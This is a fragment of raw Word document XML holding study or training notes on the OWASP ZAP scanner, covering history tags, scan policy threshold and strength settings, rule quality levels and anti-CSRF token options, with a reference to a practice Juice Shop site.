      </w:r>
      <w:hyperlink r:id="R73fe01e2c26545e9">
        <w:r w:rsidRPr="449E37A7" w:rsidR="08F312A7">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Manage History Tags dialog</w:t>
        </w:r>
      </w:hyperlink>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br/>
      </w:r>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They can also be automatically added via </w:t>
      </w:r>
      <w:hyperlink r:id="R0b7931b2468c4de0">
        <w:r w:rsidRPr="449E37A7" w:rsidR="08F312A7">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Passive scanning</w:t>
        </w:r>
      </w:hyperlink>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 this allows you to automatically tag pages which match a particular regular expression.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08F312A7" w:rsidP="449E37A7" w:rsidRDefault="08F312A7" w14:paraId="584125A2" w14:textId="35A7242F">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Tags are shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="R1249d1b26a3e4cb6">
        <w:r w:rsidRPr="449E37A7" w:rsidR="08F312A7">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History tab</w:t>
        </w:r>
      </w:hyperlink>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and can be </w:t>
      </w:r>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filtered on</w:t>
      </w:r>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using the </w:t>
      </w:r>
      <w:hyperlink r:id="Rc8518808997149bf">
        <w:r w:rsidRPr="449E37A7" w:rsidR="08F312A7">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History Filter dialog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="449E37A7" w:rsidR="08F312A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p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="20742037" w14:textId="6DEA97BA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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06 – Dec</w:t>
      </w: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t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="417D031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2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D4846BB" w:rsidP="449E37A7" w:rsidRDefault="1D4846BB" w14:paraId="7F0E1FB7" w14:textId="27C7A57A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1D4846BB">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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scan Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D4846BB" w:rsidP="449E37A7" w:rsidRDefault="1D4846BB" w14:paraId="5153F85D" w14:textId="79EF02FF">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A scan policy defines exactly which </w:t>
      </w:r>
      <w:hyperlink r:id="R96cfba033aec40fc">
        <w:r w:rsidRPr="449E37A7" w:rsidR="1D4846BB">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rules</w:t>
        </w:r>
      </w:hyperlink>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are run as part of an </w:t>
      </w:r>
      <w:hyperlink r:id="Ra9173b17ab784061">
        <w:r w:rsidRPr="449E37A7" w:rsidR="1D4846BB">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active scan</w:t>
        </w:r>
      </w:hyperlink>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br/>
      </w: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It also defines how these rules run influencing how many requests are made and how likely potential issues are to be flagged.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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You can define as many scan policies as you like and select the most </w:t>
      </w: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appropriate one</w:t>
      </w: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when you start the scan via the </w:t>
      </w:r>
      <w:hyperlink r:id="R080339a2442f49fb">
        <w:r w:rsidRPr="449E37A7" w:rsidR="1D4846BB">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Active Scan Dialog</w:t>
        </w:r>
      </w:hyperlink>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r>
        <w:br/>
      </w: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You can define the default scan policy to be used for active scans and for the </w:t>
      </w:r>
      <w:hyperlink r:id="R1692af3c836146b9">
        <w:r w:rsidRPr="449E37A7" w:rsidR="1D4846BB">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Attack mode</w:t>
        </w:r>
      </w:hyperlink>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via the </w:t>
      </w:r>
      <w:hyperlink r:id="R17d0f385b68d4156">
        <w:r w:rsidRPr="449E37A7" w:rsidR="1D4846BB">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Options Active Scan screen</w:t>
        </w:r>
      </w:hyperlink>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D4846BB" w:rsidP="449E37A7" w:rsidRDefault="1D4846BB" w14:paraId="22E1230B" w14:textId="117D4D0A">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Active scanning is an attack on those targets.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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You should NOT use it on web applications that you do not own.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D4846BB" w:rsidP="449E37A7" w:rsidRDefault="1D4846BB" w14:paraId="2FCF5729" w14:textId="5937A786">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It should be noted that active scanning can only find certain types of vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Logical vulnerabilities, such as broken access control, will not be found by any active or automated vulnerability scanning.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1D4846B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Manual penetration testing should always be performed in addition to active scanning to find all types of vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="59153018" w14:textId="1E833DBB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="3829E568" w14:textId="019CF80C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="417D031A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan Policy Dialog </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="35700987" w14:textId="2A6D682B">
      <w:p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This allows you to enable and disable the rules that are run when performing an </w:t>
      </w:r>
      <w:hyperlink r:id="R4a90be24265d478a">
        <w:r w:rsidRPr="449E37A7" w:rsidR="417D031A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>active scan</w:t>
        </w:r>
      </w:hyperlink>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="764D761D" w:rsidP="449E37A7" w:rsidRDefault="764D761D" w14:paraId="0D318E74" w14:textId="36AD94F3">
      <w:p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The first screen allows you to define the default levels as well as the levels for all of the rules in a specific category.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="764D761D" w:rsidP="449E37A7" w:rsidRDefault="764D761D" w14:paraId="0647EADB" w14:textId="58A46EF6">
      <w:p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The category screens allow you to define the levels for every individual rule.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="764D761D" w:rsidRDefault="417D031A" w14:paraId="6590DFE2" w14:textId="422AF474">
      <w:pPr>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Note that </w:t>
      </w:r>
      <w:hyperlink r:id="R6d4b9c2cbbc341f8">
        <w:r w:rsidRPr="449E37A7" w:rsidR="417D031A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>passive scan</w:t>
        </w:r>
      </w:hyperlink>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rules are no longer managed via this dialog but are instead managed via the </w:t>
      </w:r>
      <w:hyperlink r:id="R4b1f1381b6fe4018">
        <w:r w:rsidRPr="449E37A7" w:rsidR="417D031A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Options Passive Scan Rules</w:t>
        </w:r>
      </w:hyperlink>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="764D761D" w:rsidRDefault="417D031A" w14:paraId="1FB17CDE" w14:textId="1ED9D675">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="417D031A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">Threshold </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="085A1C91" w14:textId="513D6921">
      <w:p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This controls how likely ZAP is to report potential vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="6433E2F0" w14:textId="4A06CB68">
      <w:p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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="21D782CA" w14:textId="152CE930">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If you select </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Off</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then the scan rule </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won't</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run. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="0FF9EE76" w14:textId="0EA6E27F">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If you select </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Low</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then more potential issues will be raised which may increase the number of false positives. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="727D1DF0" w14:textId="521F9D85">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If you select </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High</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then fewer potential issues will be raised which may mean that some </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real issues</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are missed (false negatives). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="7317780E" w14:textId="7BAA88F2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="417D031A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Strength </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="06096897" w14:textId="030B1708">
      <w:p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This controls the number of attacks that ZAP will perform.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="7E78E2C3" w14:textId="46E3DF78">
      <w:p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If you select </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Low</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then fewer attacks will be used which will be quicker but may miss some issues.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="6B3C904E" w14:textId="68FA3961">
      <w:p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If you select </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High</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then more attacks will be used which may find more issues but will take longer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="39FBA874" w14:textId="5A4D95B4">
      <w:p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The Insane level should typically only be used for small parts of an application as it can result in </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a very large</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 xml:space="preserve"> number of attacks being used, which can take a considerable length of time. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BF2C527" w:rsidP="764D761D" w:rsidRDefault="1BF2C527" w14:paraId="34AEBB0D" w14:textId="7AFBA92F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="1BF2C527">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Quality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BF2C527" w:rsidP="764D761D" w:rsidRDefault="1BF2C527" w14:paraId="4354C8DC" w14:textId="24746186">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off"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Release:</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which</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indicate</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they are of high quality and fit for purpose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BF2C527" w:rsidP="764D761D" w:rsidRDefault="1BF2C527" w14:paraId="78A56EB0" w14:textId="2843587E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off"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Beta       which </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indicates</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they are of reasonable quality but may be incomplete or need further testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BF2C527" w:rsidP="764D761D" w:rsidRDefault="1BF2C527" w14:paraId="5C7E2547" w14:textId="7AC28382">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off"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Alpha      which </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indicates</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they are at an early stage of development</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BF2C527" w:rsidP="764D761D" w:rsidRDefault="1BF2C527" w14:paraId="06EEBF3B" w14:textId="0C864200">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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So basically, beta</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scan rules might be less </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accurate</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="1BF2C5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t xml:space="preserve"> than release ones, and alpha ones even more so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="7F42FCE4" w14:textId="1E72556E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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pPr>
    </w:p>
    <w:p w:rsidR="417D031A" w:rsidP="449E37A7" w:rsidRDefault="417D031A" w14:paraId="5024A046" w14:textId="024DDD26">
      <w:pPr>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="417D031A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="417D031A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Please be aware that use of the moniker "Insane" with regard to scan strength is simply a name chosen to represent the most extreme strength of scanning, it is not a commentary or reference to mental health or personal stability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="708373BA" w14:textId="020017EF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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pPr>
    </w:p>
    <w:p w:rsidR="4EAC27A4" w:rsidP="55820FFD" w:rsidRDefault="4EAC27A4" w14:paraId="0DF4FAE3" w14:textId="38E31E9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="4EAC27A4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anti CSRF Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4EAC27A4" w:rsidP="449E37A7" w:rsidRDefault="4EAC27A4" w14:paraId="3193BFD9" w14:textId="226006A8">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pP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Anti CSRF tokens are (pseudo) random parameters used to protect against Cross Site Request Forgery (CSRF) attacks.</w:t>
      </w:r>
      <w:r>
        <w:br/>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However</w:t>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 xml:space="preserve"> they also make a penetration </w:t>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testers</w:t>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 xml:space="preserve"> job harder, especially if the tokens are regenerated every time a form is </w:t>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requested</w:t>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4EAC27A4" w:rsidP="449E37A7" w:rsidRDefault="4EAC27A4" w14:paraId="236FCBC0" w14:textId="7D2AA7BB">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pP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ZAP detects anti CSRF tokens purely by attribute names - the list of attribute names considered to be anti CSRF tokens is configured using the Options Anti CSRF screen.</w:t>
      </w:r>
      <w:r>
        <w:br/>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 xml:space="preserve">When ZAP detects these </w:t>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tokens,</w:t>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 xml:space="preserve"> it records the token value and which URL generated the token.</w:t>
      </w:r>
      <w:r>
        <w:br/>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 xml:space="preserve">Other tools, like the </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="4EAC27A4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>active scanner</w:t>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 have</w:t>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 xml:space="preserve"> options which cause ZAP to automatically regenerate the tokens when </w:t>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required</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="4EAC27A4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A7BD684" w:rsidP="55820FFD" w:rsidRDefault="1A7BD684" w14:paraId="6B11B39E" w14:textId="6FE260E2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="1A7BD684">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tokens </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A7BD684" w:rsidP="55820FFD" w:rsidRDefault="1A7BD684" w14:paraId="22D5810B" w14:textId="03E37120">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pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="1A7BD684">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The form POST parameter names that should be treated as anti CSRF tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="286FD77B" w:rsidP="55820FFD" w:rsidRDefault="286FD77B" w14:paraId="7BB500D0" w14:textId="618AF7CE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="286FD77B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Partial Matches</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="286FD77B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="286FD77B" w:rsidP="449E37A7" w:rsidRDefault="286FD77B" w14:paraId="579EB254" w14:textId="354B646D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="300" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="286FD77B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defines if the form POST parameter names should be treated as anti CSRF tokens if they include one of the tokens (instead of requiring an exact match).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="449E37A7" w:rsidRDefault="55820FFD" w14:paraId="74990C86" w14:textId="2A7627C2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="300" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="4AC6E3D7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logged in OWASP Juice Shop Site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="4D920BA9" w14:textId="5CACE84A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4AC6E3D7">
        <w:drawing>
          <wp:inline wp14:editId="2F4ACC33" wp14:anchorId="60F0165E">
            <wp:extent cx="4572000" cy="2314575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1453159137" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R7dbedb1b6cf1477a">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="2CC72A1E" w14:textId="763C3183">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7ADF3BE4" w:rsidP="449E37A7" w:rsidRDefault="7ADF3BE4" w14:paraId="3E8571B5" w14:textId="67DB0C6D">
